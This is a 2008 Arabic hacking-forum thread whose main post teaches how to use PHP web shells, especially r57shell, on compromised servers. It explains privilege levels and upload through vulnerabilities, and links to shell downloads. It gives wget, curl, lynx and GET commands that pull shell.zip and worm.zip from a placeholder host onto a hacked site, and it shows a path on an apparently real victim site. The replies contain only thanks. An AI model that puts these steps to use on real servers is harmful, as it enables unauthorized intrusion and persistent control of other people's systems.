التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-05-2008, 05:27 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية THE GHOST
 

 

 
إحصائية العضو





THE GHOST غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
THE GHOST is on a distinguished road

.... ][الشيل !! ما هو ؟ انواعه ؟ كيف يتم رفعه ؟ وشرحه واوامره .. حصريا ][







في البداية اكثر الاعضاء يسألون
ماهو الشل؟
وما الفائده منه
وما هو استخداماته؟
وكيف يتم رفعه ؟
وماهي اوامره؟

اليوم جايبكم عشان نجاولب على كل الاسئله دى

ماهو الشل؟

وهو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux حيث يستقبل الاوامر منك ويرسلها الى السيرفر المخترق وتعرض نتائج الاوامر على الشل.

ما هو استخدامه ؟

الان الكل يسمع عن الشل وما يعرف شنو استخداماته
وانا اقولك له استخدامات كثيرة فنحن الهكرز نستخدمه في السيطرة على السيرفرات !!

والان جينا للمفيد يستخدم للسيطرة على السيرفر واحيانا السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر ووتصفح ملفاته والتعديل عليها واحيانا يستخدم فى فك الزاند وهذا حسب صلاحياتك على السيرفر

واكيد راح تقولي ايه هيه صلاحياتي ؟؟

وانا اقولك الصلاحيات يعني انت ايه على السيرفر يعنى ايه موقعك عليه
الصلاحيات على السيرفر

1- Root اي انت مدير السيرفر يعني خلاص مافي شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا
2- User هنا صلاحياتك على الموقع الي انت رافعلة شل فقط اكرر على الموقع الي انت رافعلة شل فقط اي تعدل تعطي تصاريح الا اذا انتقلت لحالة الرووت
3- nobody, http, apache هنا كلها نفس الشي ما تقدر تحذف ملفات او تعطي تصاريح للملفات
ولكن هذه الصلاحيات فيها ميزة حلوة وهي
انك تقدر تتصفح الحسابات الي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع الي انت رافعلة شل فقط

ولكن في سؤال مهم وهي اكيد انت راح
تقولي كيف اعرف صلاحياتي على السيرفر؟
وانا اقولك وانت في الشل تكتب id لمعرفة صلاحياتك وهو امر لينكس

ومن الكلام الي سبق اكيد انت استنجت شي وهي انك حتى تشغل الشل لازم ترفعة على موقع واكيد في سؤال بالطريق وهو

كيف ارفع الشل على موقع؟


وانا اقولك ولا يهمك يتم رفع الشل عن طريق الثغرات واكيد راح تسأل وتقول
ايه هي الثغرة؟ وانا اجاوبك مع انك مللتني من كثر اسالتك
الثغرة: وهي عبارة عن خطأ برمجي وضعف امني يساعدك في دخول نظام معين واختراقه وهذا الخطأ يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه واحيانا تساعدك الثغرة في الانتقال من حالة الى اخرى اي مثلا من نوبدي الى رووت حسب نوع الثغرة والثغرات تكون مكتوبة بلغة السي او البيرل او php الخ.....

والان الحمد لله عرفتوا شنو الثغرة ولنفترض انك تمكنت من رفع شل على موقع ولكن اكيد انت تبي تعرف

انواع الشل؟؟
تستطيع الدخول الى هذا الموقع والتعرف على انواع الشيلات كامله
انا رفعت عليه كل انواع الشيلات
http://www.she9ll.by.ru/
وباقى شيل واحد طبعا مش محتاجه سؤال ايه هوه

اوقولك شيل بيت الهكر
هذا الرابط المباشر للشيل

http://www.m5zn.com/Download-7.php?name=9b767ceaa2.zip

والان بعد ما الكل عرف ما هو الشل وانواعة واستخداماته راح اشرح لكم الشل الروسى

r57shell الشل الروسي الغني عن التعريف الذي انا افضله من بين كل هذه الشلات وهو يحتاج الى اوامر لينكس ولكن فيه اوامر البحث عن ملفات
الكونفك واوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك الى الموقع المخترق من خلاله واما الاصدار الجديد منه (موجود في المنتدى اصداره الجديد منزله الاخ متكي ورا الشمس)
فقد اضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك

اليكم شرحه بالصور:




والان اليكم الشرح حسب الترقيم في الصورة:
1- phpinfo هنا لمشاهدة البرامج المثبته على السيرفر وسوف اشرحها في درس اخر
2- السيف مود اوف والسيف مود هو حالة امنة يتم تفعيلها على السيرفر لمنع تطبيق الدوال.
3- اصدار الينكس للسيرفر المخترق مع اخر تحديث له وهو 2005
4- id وهو كما ذكرت صلاحياتك على السيرفر وهي نوبدي
5- pwd مسارك على السيرفر اي مكان تواجدك
6- ملفات السيرفر وهي ظاهرة في الصورة واليكم تكملة شرح الشل شوفو الصورة:



- هنا تكتب امر اللينكس مثلا id لمعرفة صلاحياتك
2- هنا المسار الذي انت عليه او اكتب pwd لمعرفة مسارك
3- هنا للتنفيذ اي عند كتابة امر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الامر واضغط انتر)
والان اشرح لكم دوال سحب الملفات والان اليكم الشرح وسوف اشرح على الدالة wget في البداية كشرح خفيف لمعرفة ان الدالة wget شغالة يجب
كتابة الامر which wget وشوفوا الصورة:



وكما تلاحظون كتبنا الامر which wget في مربع تنفيذ الاوامر ونضغط انتر وشوفو النتيجة:

[IMG]http://www.55man.com/file/mau7du8889iwnuykdpqmkcjklqwenzxgdb/4w4.jpg[/IMG

والان كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي ان الدالة شغالة والان نكتب امر السحب ولكن قبل كل ذلك يجب
ان تتأكد من ان المجلد الذي سوف تسحب الشل له يملك التصريح 777 شوفوا الصورة:



كما تلاحظون الاختيارات:
1- هذا هو التصريح 777 الذي يجب ان يكون بدون شرطات كما في الصورة
2- هذا الاختيار هو المجلد الذي سوف نسحب له الملف الذي نريد
والان كل شي جاهز المجلد ذو التصريح والملف الذي سوف نسحبه وانا هنا سوف اسحب الشل ch99 للتوضيح لا اكثر ويمكن انت بهذه الطريقة ان تسحب
الاندكس الخاصة بالاختراق او اي شي اخر والان اكتب في مكان تنفيذ الاوامر

http://www.xxx.com/shell.zip


والشرح للايعاز wget دالتنا التي سوف نسحب بها الملف والموقع الذي بجنبها رفعنا له الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الايعاز لن يظهر لك اي رد
والان نحن رفعناه مضغوط فيجب فك ضغطه بالايعاز unzip shell.zip والرد سوف يظهر في الصورة:




كما تلاحظون الرد المحاط بالاحمر يدل على نجاح العملية والان
ماذا لو لم تعمل هذه الدالة؟

اقولك ولا يهمك في دوال غيرها مثلا دالة curl ايضا اذا اردت
التحقق من ان الدالة تعمل ما عليك الا كتابة which curl واليكم شرح بعض دوال السحب
ولنفترض ان الملف الذي نود سحبه هو worm.zip نبدا بالاداة lynx وطريقة سحب الملف كما يلي

[HTML]lynx -source www.xxx.com/worm.zip > worm.zip[/HTML]

والاداة curl استخدامها كالتالي

[HTML]curl -o worm.zip www.xxx.com/worm.zip[/HTML]


واخيرا الدالة get استخدامها كالتالي

GET www.xxx.com/worm.zip > worm.zip

وكما شرحنا سابقا site.com هو الموقع الذي رفعنا الشل مضغوط له واذا اردتم معلومات اكثر عن رفع الشل شوفوا موضوعي في قسم المواضيع المتميزة لرفع الشل
والان نكمل شرح الشل الروسي لنفترض انك عندك ملف وتبي ترفعة للسيرفر والملف على جهازك وش تسوي؟؟ اقولك ولا يهمك انزل بالشل للاسفل وشوف الاختيار هذا بالصورة:


الاختيار 1- هنا لاختيار الملف من جهازك ومعناه استعراض brouse
2- هذا الاختيار معناه رفع اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والان شرح خفيف عن المسار الذي نحن فيه؟؟

[HTML]/mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/html[/HTML]

كما تلاحظون المسار الذي نحن فيه نحن لسنا على المجلد الرئيسي واكيد را تقولي شلون عرفت؟؟ وانا اقولك المجلد الرئيسي اما انه يكون public_html
او يكون على اسم الموقع كما في مسارنا او يكون www والي اخره حسب السيرفر والحين عرفتوا احنا ليش مو على المجلد الرئيسي ولكن اكيد راح تقولي ابي اصير
على المجلد الرئيسي وانا اقول تامر امر احذف المجلد html واكتب الايعاز التالي


[HTML]cd /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/[/HTML]


مثل ما شفتوا حذفنا المجلد html وكتبنا الايعاز cd وهو يستخدم للدخول الى مجلد معين وتغيير المسارة


وبالتوفيق ان شاء الله

جميع الحقوق محفوظة SaKen elKBoOr



DFhgadg !! lh i, ? hk,hui ;dt djl vtui ,avpi ,h,hlvi >> pwvdh

التوقيع

http://img300.imageshack.us/img300/1395/ssti3.gif
http://ghost-7acker.hi5.com
أعـتـذر عــن قلـة تواجـدي بسـبـب الدراسـة ادعولي بالتوفيق والنجاح ..دي بسبب الدراسة ادعولي بالتوفيق والنجاح ..

 

   

رد مع اقتباس
قديم 09-05-2008, 06:49 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية MR.hak
 

 

 
إحصائية العضو





MR.hak غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MR.hak is on a distinguished road

افتراضي


شكراشكراشكرا

التوقيع

::لتواصل::


GaMe OveRe

 

   

رد مع اقتباس
قديم 09-06-2008, 11:32 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية PiNki
 

 

 
إحصائية العضو





PiNki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PiNki is on a distinguished road

افتراضي


شكراشكراشكراشكراشكرا
بطل

   

رد مع اقتباس
قديم 09-06-2008, 11:44 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو





medaille D Or غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
medaille D Or is on a distinguished road

افتراضي


شكراشكراشكراشكراشكرا

   

رد مع اقتباس
قديم 09-07-2008, 11:55 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو






الشبح المرح غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الشبح المرح is on a distinguished road

افتراضي


مشكووووووووووووووووووووور بارك الله فيكشكراشكراشكراشكرا

   

رد مع اقتباس
قديم 09-08-2008, 12:09 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية PROF
 

 

 
إحصائية العضو







PROF غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى PROF

 

 

إحصائية الترشيح

عدد النقاط : 10
PROF is on a distinguished road

افتراضي


شكرا شكرا شكرا شكرا شكرا شكرا شكرا شكرا شكرا شكرا

شكرا شكرا شكرا شكرا شكرا شكرا
شكرا شكرا شكرا شكرا

شكرا رشكرا شكرا

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مشكلة في معرفة مسار الشل بعد رفعه taliani جـــ'ابات العناكــ'ب 6 07-01-2014 03:20 AM
حصـريا : تخطى السيف مود و العب بالدوال و تخطى تعطيل السيم لينك مـن الشيل Dr.Alaa قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 13 11-07-2013 04:10 AM


الساعة الآن 09:15 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0